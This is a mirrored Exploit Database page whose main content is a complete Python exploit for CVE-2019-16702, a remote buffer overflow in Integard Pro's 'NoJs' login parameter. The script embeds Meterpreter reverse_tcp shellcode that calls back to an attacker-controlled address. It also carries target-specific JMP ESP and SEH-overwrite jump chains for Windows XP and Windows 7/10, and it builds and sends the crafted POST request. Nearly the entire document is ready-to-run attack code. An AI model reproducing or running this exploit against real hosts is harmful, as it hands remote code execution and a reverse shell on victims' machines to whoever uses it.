Integard Pro NoJs 2.2.0.9026 – Remote Buffer Overflow

• Exploit Database
• 114 阅读

• 作者： purpl3f0xsecur1ty
  日期： 2019-12-06
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47750/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149

  Exploit Title: Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow Date: 2019-09-22 Exploit Author: purpl3f0xsecur1ty Vendor Homepage: https://www.tucows.com/ Software Link: http://www.tucows.com/preview/519612/Integard-Home Version: Pro 2.2.0.9026 / Home 2.0.0.9021 Tested on: Windows XP / Win7 / Win10 CVE: CVE-2019-16702   #!/usr/bin/python ######################################################## #~Integard Pro 2.2.0.9026 "NoJs" EIP overwrite exploit~# #~~~~~~~~~~~~~~~~Authored by purpl3f0x~~~~~~~~~~~~~~~~~# # The vulnerability: Integard fails to sanitize input# # to the "NoJs" parameter in an HTTP POST request, # # resulting in a stack buffer overflow that overwrites # # the instruction pointer, leading to remote code# # execution. # ########################################################   import socket import os import sys from struct import pack   def main(): print "~*Integard RCE Exploit for XP/7/10*~" print "Chose target: (Enter number only)" print "1)-Windows XP" print "2)-Windows 7/10" target = str(input()) host = "10.0.0.130" port = 18881   #################################################### # Integard&apos;s functionality interferes with reverse # # and bind shells. Only Meterpreter seems to work. # ####################################################   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=9001 # -b "\x00\x26\x2f\x3d\x3f\x5c" -f python -v meterpreter EXITFUNC=thread meterpreter ="\x90" * 50 meterpreter += "\xda\xcd\xbe\xa2\x51\xce\x97\xd9\x74\x24\xf4" meterpreter += "\x5f\x2b\xc9\xb1\x5b\x83\xef\xfc\x31\x77\x15" meterpreter += "\x03\x77\x15\x40\xa4\x32\x7f\x06\x47\xcb\x80" meterpreter += "\x66\xc1\x2e\xb1\xa6\xb5\x3b\xe2\x16\xbd\x6e" meterpreter += "\x0f\xdd\x93\x9a\x84\x93\x3b\xac\x2d\x19\x1a" meterpreter += "\x83\xae\x31\x5e\x82\x2c\x4b\xb3\x64\x0c\x84" meterpreter += "\xc6\x65\x49\xf8\x2b\x37\x02\x77\x99\xa8\x27" meterpreter += "\xcd\x22\x42\x7b\xc0\x22\xb7\xcc\xe3\x03\x66" meterpreter += "\x46\xba\x83\x88\x8b\xb7\x8d\x92\xc8\xfd\x44" meterpreter += "\x28\x3a\x8a\x56\xf8\x72\x73\xf4\xc5\xba\x86" meterpreter += "\x04\x01\x7c\x78\x73\x7b\x7e\x05\x84\xb8\xfc" meterpreter += "\xd1\x01\x5b\xa6\x92\xb2\x87\x56\x77\x24\x43" meterpreter += "\x54\x3c\x22\x0b\x79\xc3\xe7\x27\x85\x48\x06" meterpreter += "\xe8\x0f\x0a\x2d\x2c\x4b\xc9\x4c\x75\x31\xbc" meterpreter += "\x71\x65\x9a\x61\xd4\xed\x37\x76\x65\xac\x5f" meterpreter += "\xbb\x44\x4f\xa0\xd3\xdf\x3c\x92\x7c\x74\xab" meterpreter += "\x9e\xf5\x52\x2c\x96\x11\x65\xe2\x10\x71\x9b" meterpreter += "\x03\x61\x58\x58\x57\x31\xf2\x49\xd8\xda\x02" meterpreter += "\x75\x0d\x76\x08\xe1\xa4\x87\x0c\x71\xd0\x85" meterpreter += "\x0c\x52\x08\x03\xea\xc4\x1a\x43\xa2\xa4\xca" meterpreter += "\x23\x12\x4d\x01\xac\x4d\x6d\x2a\x66\xe6\x04" meterpreter += "\xc5\xdf\x5f\xb1\x7c\x7a\x2b\x20\x80\x50\x56" meterpreter += "\x62\x0a\x51\xa7\x2d\xfb\x10\xbb\x5a\x9c\xda" meterpreter += "\x43\x9b\x09\xdb\x29\x9f\x9b\x8c\xc5\x9d\xfa" meterpreter += "\xfb\x4a\x5d\x29\x78\x8c\xa1\xac\x49\xe7\x94" meterpreter += "\x3a\xf6\x9f\xd8\xaa\xf6\x5f\x8f\xa0\xf6\x37" meterpreter += "\x77\x91\xa4\x22\x78\x0c\xd9\xff\xed\xaf\x88" meterpreter += "\xac\xa6\xc7\x36\x8b\x81\x47\xc8\xfe\x91\x80" meterpreter += "\x36\x7d\xbe\x28\x5f\x7d\xfe\xc8\x9f\x17\xfe" meterpreter += "\x98\xf7\xec\xd1\x17\x38\x0d\xf8\x7f\x50\x84" meterpreter += "\x6d\xcd\xc1\x99\xa7\x93\x5f\x9a\x44\x08\x6f" meterpreter += "\xe1\x25\xaf\x90\x16\x2c\xd4\x90\x17\x50\xea" meterpreter += "\xad\xce\x69\x98\xf0\xd3\xcd\x83\xee\xf9\x3b" meterpreter += "\x2c\xb7\x68\x86\x31\x48\x47\xc5\x4f\xcb\x6d" meterpreter += "\xb6\xab\xd3\x04\xb3\xf0\x53\xf5\xc9\x69\x36" meterpreter += "\xf9\x7e\x89\x13"   if target == "1": print "[*] Sending Windows XP payload using meterpreter/reverse_tcp" # JMP ESP at 0x3E087557 in iertutil.dll crash = "A" * 512 crash += pack("<L",0x3E087557) crash += meterpreter crash += "C" * (1500 - len(crash))   buffer = "" buffer += "POST /LoginAdmin HTTP/1.1\r\n" buffer += "Host: 10.0.0.130:18881\r\n" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer += "Accept-Language: en-US,en;q=0.5\r\n" buffer += "Accept-Encoding: gzip, deflate\r\n" buffer += "Referer: http://10.0.0.130:18881/\r\n" buffer += "Connection: close\r\n" buffer += "Upgrade-Insecure-Requests: 1\r\n" buffer += "Content-Type: application/x-www-form-urlencoded\r\n" buffer += "Content-Length: 78\r\n\r\n" buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(buffer) s.close() print "[*] Done"   if target == "2": print "[*] Sending Windows 7/10 payload using meterpreter/reverse_tcp"   # ASLR IS ON!!! MUST USE NON-ASLR MODULE! # POP POP RET in integard.exe (ASLR disabled) nSEH = "\xEB\xD0\x90\x90" # Jump 48 bytes backwards SEH = pack("<L",0x004042B0)   jumpCall = "\xEB\x09" # Jump 11 bytes forward to hit the CALL in bigBackJump bigBackJump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"   crash = "\x90" * (2776 -len(jumpCall) - len(bigBackJump) - len(meterpreter) - 50) crash += meterpreter crash += "\x90" * 50 crash += jumpCall crash += bigBackJump crash += nSEH crash += SEH     buffer = "" buffer += "POST /LoginAdmin HTTP/1.1\r\n" buffer += "Host: 10.0.0.130:18881\r\n" buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0\r\n" buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buffer += "Accept-Language: en-US,en;q=0.5\r\n" buffer += "Accept-Encoding: gzip, deflate\r\n" buffer += "Referer: http://10.0.0.130:18881/\r\n" buffer += "Connection: close\r\n" buffer += "Upgrade-Insecure-Requests: 1\r\n" buffer += "Content-Type: application/x-www-form-urlencoded\r\n" buffer += "Content-Length: 78\r\n\r\n" buffer += "Password=asdf&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=" + crash + "&LoginButtonName=Login\r\n"   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(buffer) s.close() print "[*] Done"   main()